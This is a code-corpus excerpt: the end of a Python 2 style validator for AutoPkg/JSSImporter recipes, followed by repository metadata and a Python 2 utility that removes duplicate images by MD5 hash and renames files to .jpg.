approved list." result = recipe["Input"].get("CATEGORY") in VALID_CATEGORIES return (result, description) def test_policy_category_value(recipe): """Test that policy category is Testing. Args: recipe: Recipe object. Returns: Tuple of Bool: Failure or success, and a string describing the test and result. """ result = False description = "POLICY_CATEGORY is 'Testing'." result = (recipe["Input"].get("POLICY_CATEGORY") == "Testing") return (result, description) def test_policy_template_value(recipe): """Test that policy template is valid. Args: recipe: Recipe object. Returns: Tuple of Bool: Failure or success, and a string describing the test and result. """ result = False description = "POLICY_TEMPLATE is 'PolicyTemplate.xml'." result = recipe["Input"].get("POLICY_TEMPLATE") == "PolicyTemplate.xml" return (result, description) def test_icon_name(recipe): """Test that icon name is valid. Args: recipe: Recipe object. Returns: Tuple of Bool: Failure or success, and a string describing the test and result. """ result = False description = "SELF_SERVICE_ICON name is NAME.png or %NAME%.png." result = (recipe["Input"].get("SELF_SERVICE_ICON") in (recipe["Input"].get("NAME") + ".png", "%NAME%.png")) return (result, description) def test_group_name(recipe): """Test that group name is valid. Args: recipe: Recipe object. Returns: Tuple of Bool: Failure or success, and a string describing the test and result. """ result = False description = "GROUP_NAME is '%NAME%-update-smart'." result = recipe["Input"].get("GROUP_NAME") == "%NAME%-update-smart" return (result, description) def test_group_template(recipe): """Test that group template is valid. Args: recipe: Recipe object. Returns: Tuple of Bool: Failure or success, and a string describing the test and result. """ result = False required_template = "SmartGroupTemplate.xml" cfbundletemplate = "CFBundleVersionSmartGroupTemplate.xml" description = "GROUP_TEMPLATE is '%s'." % required_template name = recipe["Input"].get("NAME") group_template = recipe["Input"].get("GROUP_TEMPLATE") if group_template == required_template: result = True else: # Check to see if there is an extension attribute, requiring a # custom group template. has_ext_attrs = get_jssimporter(recipe)["Arguments"].get( "extension_attributes") if has_ext_attrs and group_template in [name + required_template, cfbundletemplate]: result = True description = ("GROUP_TEMPLATE is '%s' (Properly formed " "extension-attribute-supporting smart group " "template provided." % (name + required_template)) return (result, description) def test_groups_argument(recipe): """Test that groups argument is as specified in style-guide. Args: recipe: Recipe object. Returns: Tuple of Bool: Failure or success, and a string describing the test and result. """ result = False description = "'groups' argument to JSSImporter is correct." groups_args = get_jssimporter(recipe)["Arguments"]["groups"] groups_len_compliant = len(groups_args) == 1 if groups_len_compliant: group = groups_args[0] group_name_compliant = group["name"] == "%GROUP_NAME%" group_smart_compliant = group["smart"] == True group_template_compliant = group["template_path"] == "%GROUP_TEMPLATE%" if all((group_name_compliant, group_smart_compliant, group_template_compliant)): result = True return (result, description) def test_extension_attributes(recipe): """Determine whether extension attributes are configured. Args: recipe: Recipe object. Returns: Tuple of Bool: Failure or success, and a string describing the test and result. """ result = False description = "Recipe has no extension attributes." extension_attributes = get_jssimporter( recipe)["Arguments"].get("extension_attributes") if not extension_attributes: result = True else: description += (" (WARNING: Extension attributes only allowed when " "absolutely necessary.") result, description = test_extension_attribute_arguments(recipe) return (result, description) def test_extension_attribute_arguments(recipe): """Determine whether extension attributes are configured correctly. Args: recipe: Recipe object. Returns: Tuple of Bool: Failure or success, and a string describing the test and result. """ result = False name = recipe["Input"].get("NAME") description = ("WARNING: Recipe has extension attributes. Extension " "attributes meet style guidelines.") extension_attributes = get_jssimporter( recipe)["Arguments"].get("extension_attributes") ext_attr_templates = [ext_attr.get("ext_attribute_path") for ext_attr in extension_attributes if ext_attr.get("ext_attribute_path") not in ALLOWED_EXTENSION_ATTRIBUTES] template_names_compliant = all((filename.startswith(name) and filename.endswith("ExtensionAttribute.xml") for filename in ext_attr_templates)) directory = os.path.dirname(recipe.filename) templates_exist = all((os.path.isfile(os.path.join(directory, filename)) for filename in ext_attr_templates)) result = template_names_compliant and templates_exist return (result, description) def test_scripts(recipe): """Determine whether scripts are configured. Args: recipe: Recipe object. Returns: Tuple of Bool: Failure or success, and a string describing the test and result. """ result = False description = "Recipe has no scripts." scripts = get_jssimporter( recipe)["Arguments"].get("scripts") if not scripts: result = True else: description += (" (WARNING: Scripts only allowed when absolutely " "necessary.") result, description = test_scripts_arguments(recipe) return (result, description) def test_scripts_arguments(recipe): """Determine whether scripts are configured correctly. Args: recipe: Recipe object. Returns: Tuple of Bool: Failure or success, and a string describing the test and result. """ result = False name = recipe["Input"].get("NAME") description = ("WARNING: Recipe has scripts. Scripts arguments meet " "style guidelines.") scripts = get_jssimporter(recipe)["Arguments"].get("scripts") script_templates = [script.get("template_path") for script in scripts] template_names_compliant = all((filename.startswith(name) and filename.endswith("ScriptTemplate.xml") for filename in script_templates)) directory = os.path.dirname(recipe.filename) templates_exist = all((os.path.isfile(os.path.join(directory, filename)) for filename in script_templates)) script_names = [script.get("name") for script in scripts] script_names_compliant = all((filename.startswith(name) for filename in script_names)) result = (template_names_compliant and templates_exist and script_names_compliant) return (result, description) def test_icon(recipe): """Determine whether recipe file exists and parses. Args: recipe: Recipe object. Returns: Tuple of Bool: Failure or success, and a string describing the test and result. """ allowed_dimensions = (128, 300) result = False description = "Icon is a 128x128px PNG file." directory = os.path.dirname(recipe.filename) icon_filename = recipe["Input"].get("SELF_SERVICE_ICON") if icon_filename == "%NAME%.png": icon_filename = "%s.png" % recipe["Input"].get("NAME") icon_path = os.path.join(directory, icon_filename) if os.path.exists(icon_path): width, height, format = get_image_properties(icon_path) if (width in allowed_dimensions and height == width and format.upper() == "PNG"): result = True else: description += " (Image is %ix%i of type %s)" % (width, height, format) else: description += " (Icon not found)" return (result, description) def get_image_properties(path): """Get the width, height, and format of an image using sips. Args: path: String path to image file. Returns: Tuple of (int: width, int: height, and string: image format) """ args = ["/usr/bin/sips", "-g", "pixelWidth", "-g", "pixelHeight", "-g", "format", path] output = subprocess.check_output(args).splitlines() width = int(output[1].rsplit()[-1]) height = int(output[2].rsplit()[-1]) format = output[3].rsplit()[-1] return width, height, format def test_lint(recipe): """Determine whether recipe file lints. Args: recipe: Recipe object. Returns: Tuple of Bool: Failure or success, and a string describing the test and result. """ result = False description = "Recipe file passes plutil -lint test." args = ["/usr/bin/plutil", "-lint", recipe.filename] output = subprocess.check_output(args) if output.rsplit()[-1] == "OK": result = True return (result, description) def print_bar(length=79): """Print a line of '-'s.""" print length * "-" def main(): parser = get_argument_parser() args = parser.parse_args() for recipes_arg in args.recipe: recipes = get_recipes(recipes_arg) for recipe in recipes: validate_recipe(recipe, args.verbose) if __name__ == "__main__": main()
b733ea8133fef7f09f21b15c9685e7e52dd55c44
eecef46270f30ca7aa37e91da29535051ece8912
/tensorflow/tensorflow_tools/data_prepocess_tools/md5_compare.py
a70a69f076286c902298e0d803264d048e2b590b
[ "Apache-2.0" ]
permissive
bowen9799/cuisine-detection
c1680153b8102207bf64fb9c1b527291d552cb23
c805e82b1d13aede835b5ffb4713addf9dd4f5ec
refs/heads/master
2020-03-19T13:40:48.881447
2018-06-12T23:50:29
2018-06-12T23:50:29
136,590,148
0
0
null
null
null
null
UTF-8
Python
false
false
4,269
py
# -*- coding: utf-8 -*- import os #import cv2 import shutil import sys,md5 import numpy as np #from matplotlib import pyplot as plt #from pdb import set_trace import click reload(sys) sys.setdefaultencoding('utf-8') def classify_gray_hist(hist1,hist2): degree = 0 for i in range(len(hist1)): if hist1[i] != hist2[i]: degree = degree + (1 - abs(hist1[i]-hist2[i])/max(hist1[i],hist2[i])) else: degree = degree + 1 degree = degree/len(hist1) return degree def scan_folder(path,s): files= os.listdir(path) #得到文件夹下的所有文件名称 for file in files: #遍历文件夹 file_path = os.path.join(path,file) if not os.path.isdir(file_path): #判断是否是文件夹,不是文件夹才打开 # use jpeginfo to check jpg image first. jpgcheck = 'jpeginfo' +' -c ' + file_path + ' -d' +'\n' #print "jpgpath %s"%(jpgcheck) #sys.stdout.write('\n') #sys.stdout.flush() os.system(jpgcheck) if os.path.isfile(file_path): f1 = open(file_path,'r') md5_value = md5.new(f1.read()).digest() s.append([path+"/"+file,md5_value]) else: print "%s is deleted\n"%(file_path) else: scan_folder(file_path,s) return s def scan_folder_and_remove_same(path): s=[] files= os.listdir(path) #得到文件夹下的所有文件名称 for file in files: #遍历文件夹 file_path = os.path.join(path,file) if not os.path.isdir(file_path): #判断是否是文件夹,不是文件夹才打开 if False: # use jpeginfo to check jpg image first. jpgcheck = 'jpeginfo' +' -c ' + file_path + ' -d' +'\n' os.system(jpgcheck) if os.path.isfile(file_path): f1 = open(file_path,'r') md5_value = md5.new(f1.read()).digest() if md5_value in s : os.remove(file_path) else: s.append(md5_value) #change file houzhui if os.path.splitext(file_path)[1] != ".jpg": newname = os.path.splitext(file_path)[0]+".jpg" #要改的新后缀 os.rename(file_path,newname) else: print "%s is deleted\n"%(file_path) else: f1 = open(file_path,'r') md5_value = md5.new(f1.read()).digest() if md5_value in s : os.remove(file_path) else: s.append(md5_value) else: scan_folder_and_remove_same(file_path) return s def mymovefile(srcfile,dstfile): if not os.path.isfile(srcfile): print "%s not exist!"%(srcfile) else: fpath,fname=os.path.split(dstfile) #分离文件名和路径 if not os.path.exists(fpath): os.makedirs(fpath) #创建路径 shutil.move(srcfile,dstfile) #移动文件 print "move %s -> %s"%( srcfile,dstfile) def compare_and_move(path, compared_path): file_list = [] scan_folder(path,file_list) s_images = [] print(path) for i in range(len(file_list)-1): #print(i) for j in range(i+1,len(file_list)): if file_list[i][1]==file_list[j][1]: s_images.append(file_list[j][0]) print(file_list[i][0],file_list[j][0]) s_images_path = list(set(s_images)) for s_image_path in s_images: s_image = s_image_path.split("/")[-1] mymovefile(s_image_path, compared_path + "/" + s_image) def compare_and_delete(path): scan_folder_and_remove_same(path) @click.command() @click.option('--input_dir', default='./food_classify', help='root path of image folder') #@click.option('--same_data_dir', default='./food_same', help='file search pattern for glob') #def main(input_dir, same_data_dir): #compare_and_move(input_dir,same_data_dir) def main(input_dir): compare_and_delete(input_dir) if __name__ == '__main__': main()